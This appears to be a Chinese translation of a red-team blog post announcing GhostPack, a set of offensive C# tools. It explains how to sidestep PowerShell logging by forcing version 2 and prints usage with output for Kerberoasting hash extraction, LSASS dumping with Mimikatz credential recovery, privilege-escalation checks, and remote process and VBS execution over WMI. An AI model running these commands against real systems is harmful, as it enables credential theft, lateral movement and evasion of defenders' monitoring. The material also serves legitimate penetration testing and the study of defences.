任何一个在 SpecterOps 上关注过我或我的队友一段时间的人都知道我们是 PowerShell 的忠实粉丝。 我参与 PowerShell 的攻击性项目已经有4年了, @mattifestation 是 PowerSploit 和各种防御性项目的创始人, @jaredcatkinson 多年来一直在编写 PowerShell 的防御性项目,我的许多队友(@tifkin_, @enigma0x3, rvrsh3ll, @xorrior, @andrewchiles 等)在过去几年里已经编写了各种与安全相关的 PowerShell 项目,总计有数千行代码。
到目前为止,选择 PowerShell 的原因应该是不言而喻的; PowerShell 语言是图灵完备的,内置在现代 Windows 操作系统中,你可以用它做任何你想做的事情。 我们对 PowerShell 的熟悉以及它在现代平台上的无处不在,使得它成为我们用来实现验证概念和快速成型的首选编程语言,以及像 PowerShell Empire 这样更具体的项目。
在 PowerShell 团队使用 PowerShell 版本 5 完成了令人敬畏的工作之后,一切都改变了(至少在一定程度上) 。最典型的就是“PowerShell ♥ the Blue Team” 这篇博客文章在2015年6月发布(具有讽刺意味的是,该博客文章发布于 Empire 发布前的一个月) ,这篇博文详细介绍了 PowerShell 引擎中集成的所有令人惊叹的新的安全防护特性,从更好的脚本转录,到有一定深度的脚本阻塞记录,AMSI 等等。 当关于这些主题的博文的热度逐渐减弱的时候,我有一个轻微的预感,因为我感觉到进攻性的 PowerShell 被给了一记致命的打击。
但是你猜怎么着? 三年过去了,我们仍然在许多场景中使用 PowerShell,(攻击性的)这片天并没有塌下来。 对于几乎每一个防御性的进步,攻击性的团体往往以同样的方式做出了回应。 去年在 PSConfEU 的“Catch Me If You Can: PowerShell Red vs Blue”(抓到我如果你可以的话:PowerShell 的攻与防)演讲中,我详细描述了面向安全的 PowerShell 历史,而@mattifestation 在我们的 对手策略: PowerShell 课程 中,对 PowerShell 相关的安全控制做了一些深入的绕过研究。
三年过去了,关于为什么我们能够继续使用 PowerShell 代码,我主要观察到两点:
· 「第二版本的问题」: 遗憾的是,许多部署了 PowerShell 版本 5的组织要么没有卸载 PowerShell Version 2,要么出于向后兼容的原因实际安装了版本2。版本2的 PowerShell 没有利用 PowerShell 团队实现的任何令人敬畏的安全保护特性,因此如果我们能够强制这个版本的引擎加载,那么我们就没有什么可担心的了。事实上,这可以很容易地做到,比如执行 powershell.exe -version 2, 或者当我们在使用使用@tifkin_ 编写的UnmanagedPowerShell 项目时,我们可以手动加载任何版本。并且大多数时候,安全软件也不会检测异常的 PowerShell 宿主程序, 例如将 system.management.automation.dll 加载到非 powershell.exe 进程中。
· 缺乏集中化的日志记录: 从脚本块日志记录的角度来看,PowerShell 对于我们这些攻击者来说是可怕的。 正如 Jeffrey Snover 和 Lee Holmes 在 2017年 DerbyCon 大会主题演讲中提到的,"我们知道你可以选择后漏洞利用的开发语言,我们很高兴你选择了 PowerShell。" 然而,正如我们所看到的,为了使这个系统在环境中有效,a) Windows 10 或 server 2016 需要被广泛的部署,b)日志必须在主机级别上正确启用,c)主机日志必须转发到一个集中的 SIEM 或 分析平台,d)事件响应者必须关注并对日志进行正确的分析,e)事件响应者必须能够在合理的时间内作出反应。 如果这些部分中的任何一部分出现故障(在大型组织中经常出现这种情况) ,红队和真正的攻击者仍然可以非常有效地使用具有攻击性的 PowerShell 工具包。
我们是拉斐尔 · 马奇所说的"深度进攻"的忠实拥护者。 简而言之,我们喜欢在单一工具或攻击性技术在特定环境中失败时有所选择。 关于这一点,我们已经说了好几年了(和其他很多人一样) ,当谈论到 PowerShell 的背景时,转向攻击性 C# 是最有意义的。 尽管你失去了惊人的 PowerShell 管道以及调用加载内存中所有代码的单线程存根的能力,但你仍然保留了对已经存在的 .Net 库的所有访问,并获得额外的武器化向量(想想@subtee’s 的各种应用程序白化绕过方式) ,有一些额外的混淆选项,可以避免所有的 PowerShell 安全保护。 尽管学习构建一个 C# 项目而不是一个简单的 PowerShell 脚本会有一些额外的成本,但我们确实相信 PowerShell 是一个很好的通向 C# 的"有毒入口"。
所以说完这一点,我想介绍一下我们在过去几个月里一直在做的一些事情。
GhostPack
Ghostpack (目前)是以前 PowerShell 功能的各种 C# 实现的集合,包括今天发布的六个独立的工具集—— Seatbelt, SharpUp, SharpRoast, SharpDump, SafetyKatz, 和 SharpWMI。 所有这些项目都将托管在 GhostPack 的 GitHub 代码仓库中,每个项目作为一个独立的存储库分离出来。
附带说明: GhostPack 并不打算只用 C# 代码,也不是纯粹的进攻性工具包,尽管今天发布的项目都是 C# 代码。我们的计划是让组织容纳许多与安全相关的项目,并且希望这些项目不是 PowerShell 相关的。 此外,为了防止防御者构建签名检测该工具包(请考虑标记各个作者的 Twitter 用户名:) ,我们目前不打算为任何项目发布二进制文件。 然而,所有的东西都是与 Visual Studio Community 2015 兼容的,所以你很容易就可以自己构建。
充分披露: 这几乎不是什么"新"的东西,只是许多人多年来一直使用的相同技术的不同实现。 此外,这里的所有代码都应该被认为是 beta 版——它已经进行了一些测试,但仍然存在大量的 bug)
安全带(Seatbelt)
Seatbelt 是迄今为止发布的最丰富的一个项目。 这是一个态势感知安全检查的交换所。 也就是说,它管理主机数据的收集,这些数据从进攻和防守的角度来看都可能是有趣的。 从 PowerShell 安全设置,到当前用户的 Kerberos 票证,到删除的回收站项目,以及更多(当前检查项有40+!)
安全带在它的README.md文件中描述了大量已经实现的功能,并且已经证明它在我们的渗透活动中非常有用。 它深受@tifkin_的 Get-HostProfile.ps1 以及@andrewchiles 的HostEnum.ps1 PowerShell 脚本的影响。
SeatBelt.exe会收集以下系统数据:
· BasicOSInfo ——基本操作系统信息(即架构、操作系统版本等)
· RebootSchedule ——基于事件 id 12和13的系统重新启动计划任务(最后15天)
· TokenGroupPrivs——当前进程或令牌的特权(例如 SeDebugPrivilege 等)
· UACSystemPolicies ——UAC 系统策略——通过注册表设置的 UAC 系统策略
· PowerShellSettings —— PowerShell 版本和通过注册表进行的安全设置
· AuditSettings — ——通过注册表进行的审计设置
· WEFSettings ——通过注册表进行 Windows 事件转发(Windows Event Forwarding)的设置
· LSASettings ——LSA 设置(包括认证包)
· UserEnvVariables ——当前用户环境变量
· SystemEnvVariables ——当前系统环境变量
· UserFolders —— C:\Users\下的文件夹
· NonstandardServices——非标准服务——二进制文件路径不在 C:\Windows\ 中的服务
· InternetSettings ——IE设置,包括代理服务器配置
· LapsSettings ——LAPS 设置(如果已安装)
· LocalGroupMembers ——本地管理员、 RDP 和远程 DCOM 组的成员
· MappedDrives ——当前映射的驱动器
· RDPSessions ——当前传入的 RDP 会话
· WMIMappedDrives ——通过 WMI 映射的驱动器
· NetworkShares ——网络共享
· FirewallRules ——防火墙拒绝规则,完整导出所有规则
· AntiVirusWMI ——已注册的反病毒软件(通过 WMI)
· InterestingProcesses ——"趣味"进程ー防御性产品和管理工具
· RegistryAutoLogon——注册表中的自动登录信息
· RegistryAutoRuns ——注册表中的自动运行信息
· DNSCache —— DNS 缓存条目(通过 WMI)
· ARPTable ——列出当前的 ARP 表和适配器信息(等价于 ARP-a)
· AllTcpConnections ——列出当前的 TCP 连接和相关进程
· AllUdpConnections ——列出当前 UDP 连接和相关进程
· NonstandardProcesses——进程的二进制路径不在 C:\Windows\中的进程
如果用户处于高度完整状态,则运行以下附加操作:
· SysmonConfig——来自注册表的 Sysmon 配置
SeatBelt.exe user 命令会收集以下用户数据:
· 检查 Firefox 是否有历史文件
· 检查 Chrome 是否有历史文件
· TriageIE ——IE浏览器书签和最后七天的历史记录
· SavedRDPConnections ——已保存的 RDP 连接,包括用户名
· RecentRunCommands ——最近"运行"的命令
· PuttySessions ——已保存的 Putty 配置
· PuttySSHHostKeys—— 已保存的 putty SSH 主机密钥
· RecentFiles ——解析最近七天的「最近文件」快捷方式
如果用户处于高度完整性状态,这些检查将针对所有用户而不仅仅针对当前用户。
其他杂项:
· CurrentDomainGroups —当前用户的本地用户组和域用户组
· Patches — 通过 WMI 安装的补丁(在某些系统上需要)
· LogonSessions —用户登录会话数据
· KerberosTGTData ——列出所有的 TGT 票证
· InterestingFiles ——与用户文件夹中的各种模式相匹配的文件
· IETabs ——打开 Internet Explorer 浏览器标签页
· TriageChrome—— Chrome 浏览器书签和历史
· TriageFirefox ——Firefox 历史记录(无书签)
· RecycleBin ——过去30天内删除的回收站中的文件(只能在用户上下文中使用)
· KerberosTickets ——列出 Kerberos 票证,如果是特权升级的,则会列出所有按所有登录会话分组的票证
· 4624Events ——来自安全事件日志的4624登录事件
· 4648Events ——来自安全事件日志的4648登录事件
SeatBelt.exe all 会运行完整的枚举检查,可以与 full 参数组合使用。
SeatBelt.exe [CheckName] [CheckName2] … 将只运行一个或多个指定的检查(名称区分大小写!)
SeatBelt.exe [system/user/all/CheckName] full 将阻止任何过滤,并返回完整的结果。 默认情况下,某些检查会被过滤(例如,不在 c:\Windows 的服务等等)
下面是一些系统集合的例子:
有很多的检查项和有趣的信息收集操作——我非常建议你运行这些参数,看看什么是适合你的!
SharpUp
SharpUp 是 PowerUp 利用 C# 实现权限提升检查的开始。 目前,只进行了最常见的检查,尚未实施武器化功能。 目前实现的检查如下:
· GetModifiableServices ——返回当前用户可以修改的服务
· GetModifiableServiceBinaries ——返回当前用户可以修改的二进制文件的服务
· GetAlwaysInstallElevated ——返回 AlwaysInstallElevated 注册表项的值
· GetPathHijacks ——返回当前用户可以修改的%PATH% 中的任何文件夹
· GetModifiableRegistryAutoRuns ——返回设置为在 HKLM 自动运行配置中运行的任何可修改的二进制文件或脚本· GetSpecialTokenGroupPrivs ——返回”特殊"用户权限(如 SeDebugPrivilege等等)
· GetUnattendedInstallFiles ——返回任何剩余的无人参与的安装文件
· GetMcAfeeSitelistFiles ——返回 McAfee SiteList.xml 文件路径
下面是一个运行的例子:
C:\Temp>SharpUp.exe
=== SharpUp: Running Privilege Escalation Checks ===
=== Modifiable Services ===
Name
: VulnSvc
DisplayName
: VulnSvc
Description
:
State
: Stopped
StartMode
: Auto
PathName
: C:\Program Files\VulnSvc\VulnSvc.exe
=== Modifiable Service Binaries ===
Name
: VulnSvc2
DisplayName
: VulnSvc22
Description
:
State
: Stopped
StartMode
: Auto
PathName
: C:\VulnSvc2\VulnSvc2.exe
=== AlwaysInstallElevated Registry Keys ===
=== Modifiable Folders in %PATH% ===
Modifable %PATH% Folder
: C:\Go\bin
=== Modifiable Registry Autoruns ===
=== *Special* User Privileges ===
=== Unattended Install Files ===
=== McAfee Sitelist.xml Files ===
[*] Completed Privesc Checks in 18 seconds
SharpRoast
SharpRoast 是 PowerView 各种 Kerberoasting 功能的 C# 版本。 KerberosRequestorSecurityToken.GetRequest Method() 方法由@machosec 提供给 PowerView。哈希以 hashcat 格式输出。
更多关于 Kerberoasting 的信息,包括 Tim Medin 关于这个主题的原始演讲的链接,请查看我2016年11月发表的博文——“没有 Mimikatz 的 Kerberoasting"。
对当前域的所有用户进行Kerberoasting攻击:
C:\Temp>SharpRoast.exe all
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
SamAccountName : sqlservice
DistinguishedName : CN=SQL,CN=Users,DC=testlab,DC=local
ServicePrincipalName : MSSQLSvc/SQL.testlab.local
Hash : $krb5tgs$23$*$testlab.local$MSSQLSvc/SQL.testlab.local*$9994D1...
...
在当前域中针对特定的 SPN发起Kerberoasting攻击:
C:\Temp>SharpRoast.exe harmj0y
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
在当前域中针对某个特定的用户发起 Kerberoasting 攻击:
C:\Temp>SharpRoast.exe harmj0y
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
对当前域中指定 OU 的用户进行Kerberoasting攻击:
C:\Temp>SharpRoast.exe "OU=TestingOU,DC=testlab,DC=local"
SamAccountName : testuser2
DistinguishedName : CN=testuser2,OU=TestingOU,DC=testlab,DC=local
ServicePrincipalName : service/host
Hash : $krb5tgs$23$*$testlab.local$service/host*$08A6462...
在另一个(受信任的)的域的特定 SPN发起Kerberoasting攻击:
C:\Temp\>SharpRoast.exe "MSSQLSvc/[email protected]"
Hash : $krb5tgs$23$*user$DOMAIN$MSSQLSvc/[email protected]*$9994D148...
对另一个(受信任的)域中的所有用户执行Kerberoasting攻击:
C:\Temp>SharpRoast.exe "LDAP://DC=dev,DC=testlab,DC=local"
SamAccountName : jason
DistinguishedName : CN=jason,CN=Users,DC=dev,DC=testlab,DC=local
ServicePrincipalName : test/test
Hash : $krb5tgs$23$*$dev.testlab.local$test/test*$
...
这些命令中的任何一个都可以接受一个[domain.com\user][password] ,以便使用显式凭证进行 Kerberoasting攻击。例如:
[domain.com\user][password] ,以便使用显式凭证进行 Kerberoasting攻击。例如:
C:\Temp>SharpRoast.exe harmj0y "testlab.local\dfm" "Password123!"
SamAccountName : harmj0y
DistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local
ServicePrincipalName : asdf/asdfasdf
Hash : $krb5tgs$23$*$testlab.local$asdf/asdfasdf*$14AA4F...
如果遇到需要使用二次跳板机的情况,这可能很有用。
SharpDump
SharpDump 本质上是各种 PowerSploit 的 Out-Minidump.ps1 的 C# 版本。MiniDumpWriteDump Win32 API 调用用于为指定的进程 ID (默认情况下为 LSASS)创建一个转储到 to C:\Windows\Temp\debug<PID>.out 文件。GZipStream 用于将转储压缩为 C:\Windows\Temp\debug<PID>.bin(.gz 格式) ,并删除原始的 minidump 文件。
转储 LSASS (默认值)的运行例子:
C:\Temp>SharpDump.exe
[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug808.out
[+] Dump successful!
[*] Compressing C:\WINDOWS\Temp\debug808.out to C:\WINDOWS\Temp\debug808.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug808.out
[+] Dumping completed. Rename file to "debug808.gz" to decompress.
[*] Operating System : Windows 10 Enterprise N
[*] Architecture : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch
转储一个特定的进程 ID的例子:
C:\Temp>SharpDump.exe 8700
[*] Dumping notepad++ (8700) to C:\WINDOWS\Temp\debug8700.out
[+] Dump successful!
[*] Compressing C:\WINDOWS\Temp\debug8700.out to C:\WINDOWS\Temp\debug8700.bin gzip file
[*] Deleting C:\WINDOWS\Temp\debug8700.out
[+] Dumping completed. Rename file to "debug8700.gz" to decompress.
如果转储 LSASS,则可以在转储后下载这个压缩的 minidump,并重命名为 dump<PID>.gz,之后在一个类似的平台上运行 Mimikatz 的 sekurlsa::minidump命令:
SafetyKatz
SafetyKatz 是 SharpDump、@gentilkiwi 的 Mimikatz 项目和@subtee 的.NET PE loader 项目的一个组合。
首先,MiniDumpWriteDump Win32 API 调用用于创建一个保存到 C:\Windows\Temp\debug.bin 的 LSASS 转储。 然后使用@subtee 的 PELoader 加载一个自定义版本的 Mimikatz,该版本对 minidump 文件运行 sekurlsa:: logonpassword 和 sekurlsa:: ekeys,在执行完成后会删除该文件。 这个操作可以使你能够从系统中提取密码,而不必传输数兆字节的 minidump 文件,但是这可以防止 Mimikatz 的特定 OpenProcess 附加到 LSASS 进程中。
C:\Temp>SafetyKatz.exe
[*] Dumping lsass (808) to C:\WINDOWS\Temp\debug.bin
[+] Dump successful!
[*] Executing loaded Mimikatz PE
.#####. mimikatz 2.1.1 (x64) built on Jul 7 2018 03:36:26 - lil!
.## ^ ##. "A La Vie, A LAmour" - (oe.eo)
## / \ ## / *** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## >
## v ## Vincent LE TOUX ( [email protected] )
##### >/ ; *** /
mimikatz # Opening : C:\Windows\Temp\debug.bin file for minidump...
Authentication Id : 0 ;(:01b983aa)
Session : Interactive from 0
User Name : blahuser
Domain : WINDOWS10
Logon Server : WINDOWS10
Logon Time : 7/15/2018 1:07:55 PM
SID : S-1-5-21----1002
msv :
[]
Primary
* Username : blahuser
* Domain : WINDOWS10
...(snip)...
mimikatz # deleting C:\Windows\Temp\debug.bin
SharpWMI
最后一个小工具(SharpWMI)是一个各种 WMI 功能的简单 C# 包装器。 它允许通用的远程(或本地) WMI 查询、通过 Win32_Process 的远程进程执行以及通过"临时"永久 WMI 事件订阅的远程 VBS 执行。
Local system enumeration :
SharpWMI.exe action=query query="select * from win32_service" [namespace=BLAH]
Ex: SharpWMI.exe action=query query="select * from win32_process"
Ex: SharpWMI.exe action=query query="SELECT * FROM AntiVirusProduct" namespace="root\SecurityCenter2"
Remote system enumeration :
SharpWMI.exe action=query computername=HOST1[,HOST2,...] query="select * from win32_service" [namespace=BLAH]
Ex: SharpWMI.exe action=query computername=primary.testlab.local query="select * from win32_service"
Ex: SharpWMI.exe action=query computername=primary,secondary query="select * from win32_process
Remote process creation :
SharpWMI.exe action=create computername=HOST[,HOST2,...] command="C:\temp\process.exe [args]"
Ex: SharpWMI.exe action=create computername=primary.testlab.local command="powershell.exe -enc ZQBj..."
Remote VBS execution :
SharpWMI.exe action=executevbs computername=HOST[,HOST2,...]
Ex: SharpWMI.exe action=executevbs computername=primary.testlab.local
这个工具里面没有什么革命性的东西,但 WMI 事件订阅方法可以很好地服务于我们。 基于计时器的事件订阅是在远程系统上创建的,因此任意的 VBS 脚本都可以作为 ActiveScriptEventConsumer 的有效载荷。 事件触发器被触发后,你的 VBS 会被执行,之后一切都会被清理干净:
C:\Temp>SharpWMI.exe action=executevbs computername=primary.testlab.local
[*] Creating Timer object on primary.testlab.local
[*] Setting Debug event filter on primary.testlab.local
[*] Setting Debug event consumer on primary.testlab.local
[*] Binding Debug event filter and consumer on primary.testlab.local
[*] Waiting 45 seconds for event to trigger on primary.testlab.local ...
[*] Removing Timer internal timer from primary.testlab.local
[*] Removing FilterToConsumerBindingr from primary.testlab.local
[*] Removing Debug event filter from primary.testlab.local
[*] Removing Debug event consumer from primary.testlab.local
可以使用eventname=BLAH参数修改过滤器或使用者名称。 如果要更改执行的 VBS 脚本,请在编译之前修改项目顶部的 vbsPayload 字符串。 推荐使用 DotNetToJScript。
总结
我们希望有人能觉得这些代码对他有所帮助,我们鼓励任何对 C# 开发犹豫不决的人冒险尝试一下! 对于开始这个代码库的 C# 开发,我起初有点担心,但是在最初的几天之后,我意识到从 PowerShell 转换是多么的容易。 此外,我还想重申,从我们攻击者的角度来看,面向安全的 PowerShell 并没有"死亡"——我们仍将继续使用它,但我们希望开发出的工具集具有多样性。
我们还有一些工具和修改会在接下来的几个月中推出,所以希望代码存储库能够保持活跃。 接下来几周的某篇文章中,我将会介绍一些 C# 武器化的细节,但在那之前,希望你玩得开心!